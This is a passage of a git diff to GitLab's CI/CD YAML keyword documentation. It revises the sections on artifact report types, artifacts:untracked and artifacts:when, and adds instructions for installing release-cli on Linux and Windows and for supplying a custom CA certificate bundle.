rspec-2.xml, rspec-3.xml]`), or a +combination thereof (`junit: [rspec.xml, test-results/TEST-*.xml]`). -#### `artifacts:reports` +##### `artifacts:reports:license_management` **(ULTIMATE)** -Use [`artifacts:reports`](../pipelines/job_artifacts.md#artifactsreports) -to collect test reports, code quality reports, and security reports from jobs. -It also exposes these reports in the GitLab UI (merge requests, pipeline views, and security dashboards). +> - Introduced in GitLab 11.5. +> - Requires GitLab Runner 11.5 and above. -These are the available report types: - -| Keyword | Description | -|-----------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------| -| [`artifacts:reports:cobertura`](../pipelines/job_artifacts.md#artifactsreportscobertura) | The `cobertura` report collects Cobertura coverage XML files. | -| [`artifacts:reports:codequality`](../pipelines/job_artifacts.md#artifactsreportscodequality) | The `codequality` report collects Code Quality issues. | -| [`artifacts:reports:container_scanning`](../pipelines/job_artifacts.md#artifactsreportscontainer_scanning) **(ULTIMATE)** | The `container_scanning` report collects Container Scanning vulnerabilities. | -| [`artifacts:reports:dast`](../pipelines/job_artifacts.md#artifactsreportsdast) **(ULTIMATE)** | The `dast` report collects Dynamic Application Security Testing vulnerabilities. | -| [`artifacts:reports:dependency_scanning`](../pipelines/job_artifacts.md#artifactsreportsdependency_scanning) **(ULTIMATE)** | The `dependency_scanning` report collects Dependency Scanning vulnerabilities. | -| [`artifacts:reports:dotenv`](../pipelines/job_artifacts.md#artifactsreportsdotenv) | The `dotenv` report collects a set of environment variables. | -| [`artifacts:reports:junit`](../pipelines/job_artifacts.md#artifactsreportsjunit) | The `junit` report collects JUnit XML files. | -| [`artifacts:reports:license_management`](../pipelines/job_artifacts.md#artifactsreportslicense_management) **(ULTIMATE)** | The `license_management` report collects Licenses (*removed from GitLab 13.0*). | -| [`artifacts:reports:license_scanning`](../pipelines/job_artifacts.md#artifactsreportslicense_scanning) **(ULTIMATE)** | The `license_scanning` report collects Licenses. | -| [`artifacts:reports:load_performance`](../pipelines/job_artifacts.md#artifactsreportsload_performance) **(PREMIUM)** | The `load_performance` report collects load performance metrics. | -| [`artifacts:reports:metrics`](../pipelines/job_artifacts.md#artifactsreportsmetrics) **(PREMIUM)** | The `metrics` report collects Metrics. | -| [`artifacts:reports:performance`](../pipelines/job_artifacts.md#artifactsreportsperformance) **(PREMIUM)** | The `performance` report collects Browser Performance metrics. | -| [`artifacts:reports:sast`](../pipelines/job_artifacts.md#artifactsreportssast) | The `sast` report collects Static Application Security Testing vulnerabilities. | -| [`artifacts:reports:terraform`](../pipelines/job_artifacts.md#artifactsreportsterraform) | The `terraform` report collects Terraform `tfplan.json` files. | +WARNING: +This artifact is still valid but is **deprecated** in favor of the +[artifacts:reports:license_scanning](#artifactsreportslicense_scanning) +introduced in GitLab 12.8. -#### `dependencies` +The `license_management` report collects [Licenses](../../user/compliance/license_compliance/index.md) +as artifacts. -By default, all [`artifacts`](#artifacts) from previous [stages](#stages) -are passed to each job. However, you can use the `dependencies` keyword to -define a limited list of jobs to fetch artifacts from. You can also set a job to download no artifacts at all. +The collected License Compliance report uploads to GitLab as an artifact and is summarized in merge requests and the pipeline view. It's also used to provide data for security +dashboards. -To use this feature, define `dependencies` in context of the job and pass -a list of all previous jobs the artifacts should be downloaded from. +##### `artifacts:reports:license_scanning` **(ULTIMATE)** -You can define jobs from stages that were executed before the current one. -An error occurs if you define jobs from the current or an upcoming stage. +> - Introduced in GitLab 12.8. +> - Requires GitLab Runner 11.5 and above. -To prevent a job from downloading artifacts, define an empty array. +The `license_scanning` report collects [Licenses](../../user/compliance/license_compliance/index.md) +as artifacts. -When you use `dependencies`, the status of the previous job is not considered. -If a job fails or it's a manual job that isn't triggered, no error occurs. +The License Compliance report uploads to GitLab as an artifact and displays automatically in merge requests and the pipeline view, and provide data for security +dashboards. -The following example defines two jobs with artifacts: `build:osx` and -`build:linux`. When the `test:osx` is executed, the artifacts from `build:osx` -are downloaded and extracted in the context of the build. The same happens -for `test:linux` and artifacts from `build:linux`. +##### `artifacts:reports:load_performance` **(PREMIUM)** -The job `deploy` downloads artifacts from all previous jobs because of -the [stage](#stages) precedence: +> - Introduced in [GitLab 13.2](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/35260) in [GitLab Premium](https://about.gitlab.com/pricing/) 13.2. +> - Requires GitLab Runner 11.5 and above. + +The `load_performance` report collects [Load Performance Testing metrics](../../user/project/merge_requests/load_performance_testing.md) +as artifacts. + +The report is uploaded to GitLab as an artifact and is +shown in merge requests automatically. + +##### `artifacts:reports:metrics` **(PREMIUM)** + +> Introduced in GitLab 11.10. + +The `metrics` report collects [Metrics](../metrics_reports.md) +as artifacts. + +The collected Metrics report uploads to GitLab as an artifact and displays in merge requests. + +##### `artifacts:reports:performance` **(PREMIUM)** + +> - Introduced in GitLab 11.5. +> - Requires GitLab Runner 11.5 and above. + +The `performance` report collects [Browser Performance Testing metrics](../../user/project/merge_requests/browser_performance_testing.md) +as artifacts. + +The collected Browser Performance report uploads to GitLab as an artifact and displays in merge requests. + +##### `artifacts:reports:requirements` **(ULTIMATE)** + +> - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/2859) in GitLab 13.1. +> - Requires GitLab Runner 11.5 and above. + +The `requirements` report collects `requirements.json` files as artifacts. + +The collected Requirements report uploads to GitLab as an artifact and +existing [requirements](../../user/project/requirements/index.md) are +marked as Satisfied. + +##### `artifacts:reports:sast` + +> - Introduced in GitLab 11.5. +> - Made [available in all tiers](https://gitlab.com/groups/gitlab-org/-/epics/2098) in GitLab 13.3. +> - Requires GitLab Runner 11.5 and above. + +The `sast` report collects [SAST vulnerabilities](../../user/application_security/sast/index.md) +as artifacts. + +The collected SAST report uploads to GitLab as an artifact and is summarized +in merge requests and the pipeline view. It's also used to provide data for security +dashboards. + +##### `artifacts:reports:secret_detection` + +> - Introduced in GitLab 13.1. +> - Made [available in all tiers](https://gitlab.com/gitlab-org/gitlab/-/issues/222788) in GitLab + 13.3. +> - Requires GitLab Runner 11.5 and above. + +The `secret-detection` report collects [detected secrets](../../user/application_security/secret_detection/index.md) +as artifacts. + +The collected Secret Detection report is uploaded to GitLab as an artifact and summarized +in the merge requests and pipeline view. It's also used to provide data for security +dashboards. + +##### `artifacts:reports:terraform` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/207528) in GitLab 13.0. +> - Requires [GitLab Runner](https://docs.gitlab.com/runner/) 11.5 and above. + +The `terraform` report obtains a Terraform `tfplan.json` file. [JQ processing required to remove credentials](../../user/infrastructure/mr_integration.md#setup). The collected Terraform +plan report uploads to GitLab as an artifact and displays +in merge requests. For more information, see +[Output `terraform plan` information into a merge request](../../user/infrastructure/mr_integration.md). + +#### `artifacts:untracked` + +Use `artifacts:untracked` to add all Git untracked files as artifacts (along +with the paths defined in `artifacts:paths`). `artifacts:untracked` ignores configuration +in the repository's `.gitignore` file. + +Send all Git untracked files: ```yaml -build:osx: - stage: build - script: make build:osx - artifacts: - paths: - - binaries/ +artifacts: + untracked: true +``` -build:linux: - stage: build - script: make build:linux - artifacts: - paths: - - binaries/ +Send all Git untracked files and files in `binaries`: -test:osx: - stage: test - script: make test:osx - dependencies: - - build:osx +```yaml +artifacts: + untracked: true + paths: + - binaries/ +``` -test:linux: - stage: test - script: make test:linux - dependencies: - - build:linux +Send all untracked files but [exclude](#artifactsexclude) `*.txt`: -deploy: - stage: deploy - script: make deploy +```yaml +artifacts: + untracked: true + exclude: + - "*.txt" ``` -##### When a dependent job fails +#### `artifacts:when` -> Introduced in GitLab 10.3. +Use `artifacts:when` to upload artifacts on job failure or despite the +failure. -If the artifacts of the job that is set as a dependency are -[expired](#artifactsexpire_in) or -[erased](../pipelines/job_artifacts.md#erasing-artifacts), then -the dependent job fails. +`artifacts:when` can be set to one of the following values: -You can ask your administrator to -[flip this switch](../../administration/job_artifacts.md#validation-for-dependencies) -and bring back the old behavior. +1. `on_success` (default): Upload artifacts only when the job succeeds. +1. `on_failure`: Upload artifacts only when the job fails. +1. `always`: Always upload artifacts. + +For example, to upload artifacts only when a job fails: + +```yaml +job: + artifacts: + when: on_failure +``` ### `coverage` @@ -4089,6 +4461,8 @@ finishes. > [Introduced](https://gitlab.com/gitlab-org/gitlab/merge_requests/19298) in GitLab 13.2. Use `release` to create a [release](../../user/project/releases/index.md). +Requires the [`release-cli`](https://gitlab.com/gitlab-org/release-cli/-/tree/master/docs) +to be available in your GitLab Runner Docker or shell executor. These keywords are supported: @@ -4110,6 +4484,99 @@ You must specify the Docker image to use for the `release-cli`: image: registry.gitlab.com/gitlab-org/release-cli:latest ``` +#### `release-cli` for shell executors + +> [Introduced](https://gitlab.com/gitlab-org/release-cli/-/issues/21) in GitLab 13.8. + +For GitLab Runner shell executors, you can download and install the `release-cli` manually for your [supported OS and architecture](https://release-cli-downloads.s3.amazonaws.com/latest/index.html). +Once installed, the `release` keyword should be available to you. + +**Install on Unix/Linux** + +1. Download the binary for your system, in the following example for amd64 systems: + + ```shell + curl --location --output /usr/local/bin/release-cli "https://release-cli-downloads.s3.amazonaws.com/latest/release-cli-linux-amd64" + ``` + +1. Give it permissions to execute: + + ```shell + sudo chmod +x /usr/local/bin/release-cli + ``` + +1. Verify `release-cli` is available: + + ```shell + $ release-cli -v + + release-cli version 0.6.0 + ``` + +**Install on Windows PowerShell** + +1. Create a folder somewhere in your system, for example `C:\GitLab\Release-CLI\bin` + + ```shell + New-Item -Path 'C:\GitLab\Release-CLI\bin' -ItemType Directory + ``` + +1. Download the executable file: + + ```shell + PS C:\> Invoke-WebRequest -Uri "https://release-cli-downloads.s3.amazonaws.com/latest/release-cli-windows-amd64.exe" -OutFile "C:\GitLab\Release-CLI\bin\release-cli.exe" + + Directory: C:\GitLab\Release-CLI + Mode LastWriteTime Length Name + ---- ------------- ------ ---- + d----- 3/16/2021 4:17 AM bin + + ``` + +1. Add the directory to your `$env:PATH`: + + ```shell + $env:PATH += ";C:\GitLab\Release-CLI\bin" + ``` + +1. Verify `release-cli` is available: + + ```shell + PS C:\> release-cli -v + + release-cli version 0.6.0 + ``` + +#### Use a custom SSL CA certificate authority + +You can use the `ADDITIONAL_CA_CERT_BUNDLE` CI/CD variable to configure a custom SSL CA certificate authority, +which is used to verify the peer when the `release-cli` creates a release through the API using HTTPS with custom certificates. +The `ADDITIONAL_CA_CERT_BUNDLE` value should contain the +[text representation of the X.509 PEM public-key certificate](https://tools.ietf.org/html/rfc7468#section-5.1) +or the `path/to/file` containing the certificate authority. +For example, to configure this value in the `.gitlab-ci.yml` file, use the following: + +```yaml +release: + variables: + ADDITIONAL_CA_CERT_BUNDLE: | + -----BEGIN CERTIFICATE----- + MIIGqTCCBJGgAwIBAgIQI7AVxxVwg2kch4d56XNdDjANBgkqhkiG9w0BAQsFADCB + ... + jWgmPqF3vUbZE0EyScetPJquRFRKIesyJuBFMAs= + -----END CERTIFICATE----- + script: + - echo "Create release" + release: + name: 'My awesome release' + tag_name: '$CI_COMMIT_TAG' +``` + +The `ADDITIONAL_CA_CERT_BUNDLE` value can also be configured as a +[custom variable in the UI](../variables/README.md#custom-cicd-variables), +either as a `file`, which requires the path to the certificate, or as a variable, +which requires the text representation of the certificate. + #### `script` All jobs except [trigger](#trigger) jobs must have the `script` keyword. A `release` @@ -4197,7 +4664,7 @@ job: #### `release:ref` -If the `release: tag_name` doesn’t exist yet, the release is created from `ref`. +If the `release: tag_name` doesn't exist yet, the release is created from `ref`. `ref` can be a commit SHA, another tag name, or a branch name. #### `release:milestones` @@ -4510,10 +4977,10 @@ meaning it applies to all jobs. If you define a variable in a job, it's availabl to that job only. If a variable of the same name is defined globally and for a specific job, the -[job-specific variable overrides the global variable](../variables/README.md#priority-of-cicd-variables). +[job-specific variable overrides the global variable](../variables/README.md#cicd-variable-precedence). All YAML-defined variables are also set to any linked -[Docker service containers](../docker/using_docker_images.md#what-is-a-service). +[Docker service containers](../services/index.md). You can use [YAML anchors for variables](#yaml-anchors-for-variables). @@ -4820,7 +5287,7 @@ reused in the `test` job: - !reference [.teardown, after_script] ``` -In the following example, `test-vars-1` reuses the all the variables in `.vars`, while `test-vars-2` +In the following example, `test-vars-1` reuses all the variables in `.vars`, while `test-vars-2` selects a specific variable and reuses it as a new `MY_VAR` variable. ```yaml @@ -4888,13 +5355,14 @@ Use [`default:`](#custom-default-keyword-values) instead. For example: ```yaml default: - image: ruby:2.5 + image: ruby:3.0 services: - docker:dind cache: paths: [vendor/] before_script: - - bundle install --path vendor/ + - bundle config set path vendor/bundle + - bundle install after_script: - rm -rf tmp/ ``` diff --git a/doc/ci/yaml/gitlab_ci_yaml.md b/doc/ci/yaml/gitlab_ci_yaml.md index 851c9776c45..2993e077268 100644 --- a/doc/ci/yaml/gitlab_ci_yaml.md +++ b/doc/ci/yaml/gitlab_ci_yaml.md @@ -76,7 +76,7 @@ branch in the project. GitLab CI/CD not only executes the jobs but also shows you what's happening during execution, just as you would see in your terminal: - + You create the strategy for your app and GitLab runs the pipeline according to what you've defined. Your pipeline status is also diff --git a/doc/ci/yaml/img/job_running.png b/doc/ci/yaml/img/job_running.png Binary files differdeleted file mode 100644 index efd138fd4f8..00000000000 --- a/doc/ci/yaml/img/job_running.png +++ /dev/null diff --git a/doc/ci/yaml/img/job_running_v13_10.png b/doc/ci/yaml/img/job_running_v13_10.png Binary files differnew file mode 100644 index 00000000000..b1f21b8445f --- /dev/null +++ b/doc/ci/yaml/img/job_running_v13_10.png |
